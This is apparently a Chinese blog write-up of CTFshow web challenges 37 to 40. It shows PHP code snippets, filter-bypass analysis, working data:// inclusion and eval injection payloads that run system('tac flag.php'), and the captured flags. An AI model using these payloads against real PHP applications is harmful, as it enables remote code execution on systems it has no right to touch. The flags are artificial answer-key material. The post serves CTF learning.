CTFshow web37 38 39 40

最新推荐文章于 2024-06-07 17:25:56 发布
最新推荐文章于 2024-06-07 17:25:56 发布
阅读量690 收藏
点赞数
分类专栏: 命令执行 渗透测试 CTF 文章标签: php web安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_40345591/article/details/127755722
版权
渗透测试 同时被 3 个专栏收录
49 篇文章 4 订阅
订阅专栏
CTF
16 篇文章 0 订阅
订阅专栏
命令执行
10 篇文章 2 订阅
订阅专栏

目录

web37

代码分析:

payload:

​编辑flag:

web38

代码分析:

payload:

​编辑flag:

web39

代码分析:

payload:

​编辑flag:

web40

代码分析:

payload:

flag:

web37

代码分析:

if(!preg_match("/flag/i", $c)){
        include($c);
        echo $flag;
    
    }

与前几题不同,前几题传入的字符串被eval当作命令执行了,而这道题是include,也就是说应该传入一个文件名,在这里被包含

但是过滤了flag,传入flag.php是行不通的,这时候可以使用data://text/plain,<?system('ls');?>

让网页直接包含我们写入的代码,从而执行恶意命令

payload:

/?c=data://text/plain,<?=system('tac fl""ag.php');?>

 注意flag需要绕过,可以使用引号绕过

flag:

ctfshow{84e1eca1-f50c-468a-a62d-15e527fa734f} 

web38

代码分析:

 if(!preg_match("/flag|php|file/i", $c))

这一题比上一题多过滤了个php,可以使用通配符绕过

payload:

/?c=data://text/plain,<?=system('tac fl*');?>

 注意flag需要绕过,可以使用引号绕过

flag:

ctfshow{f311f8d8-07a3-473c-bccb-05be9affc617}

web39

代码分析:

if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag/i", $c)){
        include($c.".php");
    }

 看起来很唬人,我觉得是不是传个flag,其实根本不用管这个.".php",多出来的部分会自动识别为字符串,所以还是跟37一样

payload:

/?c=data://text/plain,<?=system('tac fl""ag.php');?>

 注意flag需要绕过,可以使用引号绕过

flag:

ctfshow{78e78020-1ad2-446c-8a13-0cdf5e916bf4}

web40

代码分析:

 if(!preg_match("/[0-9]|\~|\`|\@|\#|\\$|\%|\^|\&|\*|\(|\)|\-|\=|\+|\{|\[|\]|\}|\:|\'|\"|\,|\<|\.|\>|\/|\?|\\\\/i", $c)){
        eval($c);

 这道题又回到eval了,但是过滤的内容有点多,翻阅了大佬的题解,发现这里面的括号是中文括号,所以可以使用套娃

套娃在前面的文章中有详细的操作流程与解释

传送门

payload:

http://7e7c4611-b901-44da-8f62-4a6c54c36e42.challenge.ctf.show/?c=eval(array_pop(next(get_defined_vars())));

post传一个参数:Chen=system('tac flag.php');

flag:

ctfshow{383cbb4b-1fbf-4209-9efb-b64720e53766}

白帽Chen_D
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
ctfshow-命令执行-web37
weixin_43400535的博客
11-03 2834
ctfshow-web37 文章目录ctfshow-web37题目描述:原理:审计:方法:思路:利用文件按包含漏洞,data协议Flag: 题目描述: 原理: 审计: <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-09-04 00:12:34 # @Last Modified by: h1xa # @Last Modified time: 2020-09-04 05:18:55 # @email: h1xa
CTFSHOW web入门——web37
m0_74093152的博客
04-24 271
include包含变量c,因此可以利用文件包含漏洞,让变量c变成php代码,然后通过include函数执行。可以使用data协议获取flag.php文件中的内容。上传payload:?过滤了flag,即c中不能有flag字段。
CTFshow web(php命令执行 37-40
csjjjd的博客
02-07 1734
先把payload写下 highlight_file(next(array_reverse(scandir(pos(localeconv())))));这里证明还是可以执行这个为协议读取phpinfo的,直接CTRL+f全局查找ctfshow这几个关键字,发现没有flag,不过没事,换个命令就好了。首先通过 pos(localeconv())得到点号,因为scandir(’.’)表示得到当前目录下的文件,所以。scandir(pos(localeconv()))就能得到flag.php了。
ctfshow-web入门-命令执行(web37-web40
最新发布
Welcome To Myon'Blog !
06-07 1699
中间件的日志文件会保存网站的访问记录,比如HTTP请求行,User-Agent,Referer等客户端信息,如果在HTTP请求中插入恶意代码,那么恶意代码就会保存到日志文件中,访问日志文件的时候,日志文件中的恶意代码就会执行,从而造成任意代码执行甚至获取shell。将我们想要执行的代码包含进去,其实和 php://input 是一样的,让用户可以控制输入流,当它与文件包含函数结合时,用户输入的 data:// 流就会被当作 php 文件执行。就会显示容器有问题了。我们也可以采用编码绕过,对
CTFSHOW web入门——web40
m0_74093152的博客
04-24 547
并且这道题使用到了eval函数(返回传入字符的表达式的结果。即将字符串当成有效的表达式,进行运算、求值并返回结果。构造payload:?过滤了一堆符号,但过滤的括号是中文的括号,所以还是可以正常使用英文括号的。并post参数:b=system(''tac flag.php)可以使用套娃去获得flag.php文件的内容。
ctfshow web入门 命令执行部分 (37-40
羽的博客
09-05 5058
39 限制了后缀,我们可以试试伪协议,以为不能带有flag,所以filter协议和php://input也不好用了。 最后试了试data协议,发现成功了。 payload c=data:text/plain,<?php system('cat f*')?> 这样就相当于执行了php语句<?php system('cat f*')?>.php 因为前面的php语句已经闭合了,所以后面的.php会被当成html页面直接显示在页面上,起不到什么作用。 40 这个题可能是出题人把英文括号打成
CTFSHOW web193 left标注盲注脚本
05-04
这段代码是一个用于获取某个网站的 flag 的脚本。它使用了 SQL 注入漏洞来获取 flag。具体来说,它通过构造 SQL 语句的方式,逐个字符地获取 flag。其中,它通过修改注入语句中的 payload 变量,来获取不同的信息,...
ctfshow web139命令盲注脚本
10-21
ctfshow靶场 web入门 web139 命令盲注脚本
ctfshow web184 正则爆破脚本0x16进制
10-21
ctfshow web184 正则爆破脚本0x16进制
CTFSHOW web183 正则爆破脚本
10-21
CTFSHOW web183 正则爆破脚本
ctfshow web214 时间盲注标准脚本
10-21
ctfshow web214 时间盲注标准脚本
Ctfshow web入门-web37 WP
qq_45427131的博客
05-18 431
首先查看源代码 代码的意思是文件包含获取到的变量c的值,但是对变量c又有过滤,要求获取到的c中不包含flag 这个地方可以用data协议rce data协议: text/plain,<?php system(‘命令’);?> 构造payload : http://1332de51-f763-40f4-b931-c2ffaac051e5.challenge.ctf.show:8080/?c=data:text/plain,<?php system('ls');?> 查看当前目录
ctfshow-web入门37-52
zx66661的博客
10-31 321
表达式包含并运行指定文件。使用data伪协议?是<??> base64加密源代码查看得到flag。
ctfshow-命令执行-web38
weixin_43400535的博客
11-03 3242
ctfshow-web38 文章目录ctfshow-web38题目描述:原理:审计:方法:思路:同web38利用data为协议Flag: 题目描述: 原理: 审计: <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-09-04 00:12:34 # @Last Modified by: h1xa # @Last Modified time: 2020-09-04 05:23:36 # @email: h1x
[ctf.show]命令执行29-54
Huamang的博客
03-01 2393
web 29 代码审计 error_reporting(0); if(isset($_GET['c'])){ $c = $_GET['c']; if(!preg_match("/flag/i", $c)){ eval($c); } }else{ highlight_file(__FILE__); } 涉及到一个函数preg_match(): 这个preg_match 函数用于执行一个正则表达式匹配。 看这次的判断是不能出现flag字样,后面的i意思
实验吧CTF刷题记录(web篇二)
热门推荐
sinat_21923549的博客
03-11 1万+
8.上传绕过 解题链接: http://ctf5.shiyanbar.com/web/upload 直接上传.php会被拦截。尝试上传图片马,能上传但不符合题目要求。 尝试bp抓包改后缀名无果,并非在客户端javascript验证。 尝试截断路径绕过,上传1.jpg文件,bp抓包,路径upload后添加1.php空格,将hex中空格20改为00,forward,成功绕过。 9
云演 【ctf实验】
errorr0
01-21 2008
矛盾 <?php $num=$_GET['num']; if(!is_numeric($num)) { echo $num; if($num==1) echo 'flag{**********}'; } ?> 正常给了一串代码,正常思维下会觉得有矛盾,矛盾点在于函数is_numeric()需要使num不为整形数字。但num==1,这是一个矛盾应该如何绕过就是需要探讨的。 首先,这是一个num与1的弱比较,而弱
GDOUCTF web部分题解 2023
Jay17的博客
04-16 1972
GDOUCTF web部分题解 2023 (已加上NSS另外两题)
NSSCTF题解
网络安全爱好者,分享渗透测试、漏洞复现、src挖掘,靶场搭建知识和技巧
03-17 1082
首先看这个代码的逻辑,我们的可控点是content,同时可以写入文件进去,在unzip函数中extractTo可以解压/tmp的文件到$_SERVER['DOCUMENT_ROOT']."/static/upload/".md5($filename),然后经过一大堆过滤,最后就是unlink删除文件,所以我们可以进行条件竞争,在解压文件和删除文件进行竞争。就可以查询出flag。响应中的hash值随着name参数的变化而变化,但又不完全是md5加密的值,这里看提示后,直接构造payload。
ctfshow web139
11-11
ctfshow web139是一道网络安全竞赛中的题目,主题是web安全。在这个题目中,我们需要通过一系列的挑战来测试我们的web安全技术。 首先,我们需要了解题目的要求和提示。然后,我们可以使用一些web安全工具来扫描和分析目标网站的漏洞。例如,我们可以使用Web漏洞扫描器来检测目标网站是否存在常见的漏洞,如SQL注入、跨站脚本、文件包含等。 同时,我们还可以通过审查网页源代码和网络请求来获取更多的信息。这样可以帮助我们理解网站的工作原理,找到潜在的漏洞。 在解决这个题目时,我们要耐心分析和尝试,可能需要使用一些编程技巧,如脚本编写。我们还可以通过搜索和学习类似的题目和解法来获取灵感和指导。 总之,ctfshow web139是一个测试我们web安全技术的挑战。通过仔细分析和尝试,结合使用web安全工具和编程技巧,我们可以逐步解决这个题目,提升自己的web安全技能。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

白帽Chen_D

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值